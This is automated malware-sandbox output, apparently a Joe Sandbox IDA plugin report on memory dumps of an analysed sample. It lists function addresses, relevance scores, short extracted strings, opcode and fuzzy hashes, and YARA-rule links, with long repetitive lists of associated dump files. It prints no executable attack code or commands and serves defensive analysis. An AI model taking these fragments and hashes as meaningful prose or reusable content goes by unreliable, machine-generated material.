Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: 3G={$6Ol$uH3s
API String ID: 0-93604064
Opcode ID: a97ac971c3b76fc00e6675186142248f9ea5a9a8bfd329546dad070f753cade3
Instruction ID: 5d0ec7f08f97f525b6b1ab3d2ddee2ea0a0706907cdf9690d855ad5ebee45b46
Opcode Fuzzy Hash: a97ac971c3b76fc00e6675186142248f9ea5a9a8bfd329546dad070f753cade3
Instruction Fuzzy Hash: 88B207F3A0C2049FE3046E29EC8567AFBE5EF94720F1A493DEAC5C7344EA3558418697

Function 0108E207 Relevance: 4.7, Strings: 3, Instructions: 914COMMON

Download Yara Rule

Strings

-Lg_, xrefs: 0108E4D7
4#S}, xrefs: 0108E3A6
QBf}, xrefs: 0108E229

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: -Lg_$4#S}$QBf}
API String ID: 0-4117771912
Opcode ID: eab8f808e429129fa13eb3ce51a9c05f9b54b92854e5a3878f62e559b0d1e637
Instruction ID: e809f0325715a780914e439c6a5b00964cf2d480834e9f8138f8954a9c7c55f2
Opcode Fuzzy Hash: eab8f808e429129fa13eb3ce51a9c05f9b54b92854e5a3878f62e559b0d1e637
Instruction Fuzzy Hash: 605218F36082049FE304AE2DDC8577ABBE6EFD4720F1A863DE6C4C3744EA3599058656

Function 00EFA3F0 Relevance: 3.2, Strings: 2, Instructions: 711COMMON

Download Yara Rule

Strings

cba`, xrefs: 00EFA429
f, xrefs: 00EFA671

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: cba`$f
API String ID: 2994545307-1109690103
Opcode ID: 30e80e096627f824eed60076f01ca768a1f746884a88300c6be61891c322a62d
Instruction ID: 4db83123e8ab37f0bf3d121710d891086d84faed7752365cb6205c2851b2590c
Opcode Fuzzy Hash: 30e80e096627f824eed60076f01ca768a1f746884a88300c6be61891c322a62d
Instruction Fuzzy Hash: 7622E3B16083499FD714CF28C980B3ABBE2ABD4304F1D953CE59AAB392D771D905CB52

Function 00F38481 Relevance: 3.0, Strings: 2, Instructions: 526COMMON

Download Yara Rule

Strings

AU3<, xrefs: 00F38B3C
Em_n, xrefs: 00F38ADD

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: AU3<$Em_n
API String ID: 0-2545480237
Opcode ID: bb0444d36a8e1320f7deedd05f9deb216fc8480002603a3e387980051747248f
Instruction ID: 8fe7a26770858beffb78ddf40a422d32e158dc7d7c3dd110c3b9a83bbfa0094a
Opcode Fuzzy Hash: bb0444d36a8e1320f7deedd05f9deb216fc8480002603a3e387980051747248f
Instruction Fuzzy Hash: 5202BDB3F156108BF3045E29DC983A6B692EB94320F2B853CDB889B7C5DA7E58058785

Function 00F4036E Relevance: 3.0, Strings: 2, Instructions: 516COMMON

Download Yara Rule

Strings

Sz, xrefs: 00F40A94
A, xrefs: 00F40489

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: A$Sz
API String ID: 0-3110128359
Opcode ID: d38f070d91682d24ad11237069772f7456b1ff365b6d195b96237f1bd3f3bdae
Instruction ID: 9d538aa9ab02fa188e8de9004e992617472930f36ab9d582c7485341207750ef
Opcode Fuzzy Hash: d38f070d91682d24ad11237069772f7456b1ff365b6d195b96237f1bd3f3bdae
Instruction Fuzzy Hash: 8802FEF3F142144BF3544E38DC99366BAD6DBA4320F2F863C9A98977C4E97E98058385

Function 00EE2270 Relevance: 3.0, Strings: 2, Instructions: 501COMMON

Download Yara Rule

Strings

TU, xrefs: 00EE2296
c!", xrefs: 00EE242F

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: TU$c!"
API String ID: 0-3813282519
Opcode ID: 13155f268542c637001dd7c0c8df7e4f3f26961ecde6ca250a1f14be86beee39
Instruction ID: dea4adc8b17d817d7d2a8d9607b9c03993e32c201a6c84525ee7c8923d53ba8b
Opcode Fuzzy Hash: 13155f268542c637001dd7c0c8df7e4f3f26961ecde6ca250a1f14be86beee39
Instruction Fuzzy Hash: 2BC177726043444BD7149F2ACC9277BB3EAEFD5318F18A42CE696E7381F678D8058752

Function 00FE40A1 Relevance: 3.0, Strings: 2, Instructions: 479COMMON

Download Yara Rule

Strings

Sow, xrefs: 00FE45F0
pkW, xrefs: 00FE4638

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: Sow$pkW
API String ID: 0-255097889
Opcode ID: 6d216bdcb83b99d186eccde009eb5b6b6ff2ed5a1991441e89357b661611a718
Instruction ID: f3751823b750e9cd17ab05f9d270949e8cd3b1c1be1bc89e334050e146b1128a
Opcode Fuzzy Hash: 6d216bdcb83b99d186eccde009eb5b6b6ff2ed5a1991441e89357b661611a718
Instruction Fuzzy Hash: 16F1E1F3E146144BF3085D38DC9937A7692EB94320F2F863D9B89A77C4E93D99068285

Function 00EC4270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 00EC42EB
IEND, xrefs: 00EC4661

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 05cbec380c4c9617cb491933e4b2cde146e790468515815f5c962740892eaff2
Instruction ID: cd9cc9dcc7f970e337368ec8178de415076ce2127536dfa2fe8d4bb04260e528
Opcode Fuzzy Hash: 05cbec380c4c9617cb491933e4b2cde146e790468515815f5c962740892eaff2
Instruction Fuzzy Hash: F6D1F3B15083449FD710CF18DA51B9EBBE0EB94304F14492DF999AB381D776D909CB82

Function 00EDD074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

pr, xrefs: 00EDD112
|~, xrefs: 00EDD10A

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: pr$|~
API String ID: 0-4145297803
Opcode ID: e7a6fd8a86581feefe3c93cbcea1059828def84520b774e082d47c542eefa96b
Instruction ID: 2cad80154874260906984748774872ce28d64a96795c02a89436bb6c89bf8de0
Opcode Fuzzy Hash: e7a6fd8a86581feefe3c93cbcea1059828def84520b774e082d47c542eefa96b
Instruction Fuzzy Hash: 5251F0B060D3508BD7008F24C81276BB7F2EF92314F18956DE4C46B361E73A9602DB5A

Function 00EDD087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

pr, xrefs: 00EDD112
|~, xrefs: 00EDD10A

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: pr$|~
API String ID: 0-4145297803
Opcode ID: 18f6956938c5c92462fd869e114d6d53c80c0d2792d7b2ff14a914d28ff6247e
Instruction ID: 83981d7b48f5b096435f306e4a0833546edc55df174defb7637b015166aafe70
Opcode Fuzzy Hash: 18f6956938c5c92462fd869e114d6d53c80c0d2792d7b2ff14a914d28ff6247e
Instruction Fuzzy Hash: 6F51D1B060D3518BD7009F24C81266BB7F2EF92314F18956DE4C56B3A1E73ADA02DB5A

Function 00FE44FF Relevance: 2.7, Strings: 2, Instructions: 195COMMON

Download Yara Rule

Strings

Sow, xrefs: 00FE45F0
pkW, xrefs: 00FE4638

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: Sow$pkW
API String ID: 0-255097889
Opcode ID: b27951d77aa28e088f6a1cf5a296e304b7a7c123256aa507ac90cb121d868d21
Instruction ID: fa1cfb245bc0518fffb01be3d80bafd8cfecf4fde32aaac321c4cd6b81b85727
Opcode Fuzzy Hash: b27951d77aa28e088f6a1cf5a296e304b7a7c123256aa507ac90cb121d868d21
Instruction Fuzzy Hash: 635139F3A082045BE7047A38DC5577BB7D5EF90320F2A4A3DDAC4D3784E93998058396

Function 00EE536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

X, xrefs: 00EE556A
BLJB, xrefs: 00EE5554

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: BLJB$X
API String ID: 0-2222927247
Opcode ID: 7ce5ee279af54bee641835dcc3b572d55c9b128b7666019eb34ef8c1efa0f4b5
Instruction ID: e7bdf2b9c8b2ff2ec953c91221056a2d2a54f06dfd6b486307b62e7185e22a05
Opcode Fuzzy Hash: 7ce5ee279af54bee641835dcc3b572d55c9b128b7666019eb34ef8c1efa0f4b5
Instruction Fuzzy Hash: A351AB32608BC98BD7308F6988412EBB7E1DF51348F58593DD5D997386E334D509E742

Function 01020060 Relevance: 1.8, Strings: 1, Instructions: 535COMMON

Download Yara Rule

Strings

Gf], xrefs: 01020652

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: Gf]
API String ID: 0-2973895781
Opcode ID: a7066e15be57800b072b230f8fb67aba347c06a4440470f5520e82b2882bc734
Instruction ID: c1b68f9bd5489700b6355488932e152acf7ebf1d1be1e8af53cdad11b6620a76
Opcode Fuzzy Hash: a7066e15be57800b072b230f8fb67aba347c06a4440470f5520e82b2882bc734
Instruction Fuzzy Hash: 5D02D3F3F146204BF3084D29DD99366B692EBD4320F2B863D9E89A77C8D97E9C054385

Function 0105A5A1 Relevance: 1.8, Strings: 1, Instructions: 505COMMON

Download Yara Rule

Strings

M1lH, xrefs: 0105AB33

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: M1lH
API String ID: 0-3705421138
Opcode ID: 4bea79cb57693b6b0330a2f48a1928af8efe09c9ae4f59725382800677adc255
Instruction ID: 023157ca308b71a8c5ccc26f771fde3d184d59a9abab023b344a3d5f93a6de8b
Opcode Fuzzy Hash: 4bea79cb57693b6b0330a2f48a1928af8efe09c9ae4f59725382800677adc255
Instruction Fuzzy Hash: 8BF1F4B3E146204BF3444E28DC953A6B6D2EB94720F1B863CDF98AB7C4D97E9C058785

Function 00F4C671 Relevance: 1.7, Strings: 1, Instructions: 490COMMON

Download Yara Rule

Strings

WGu, xrefs: 00F4CB2F

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
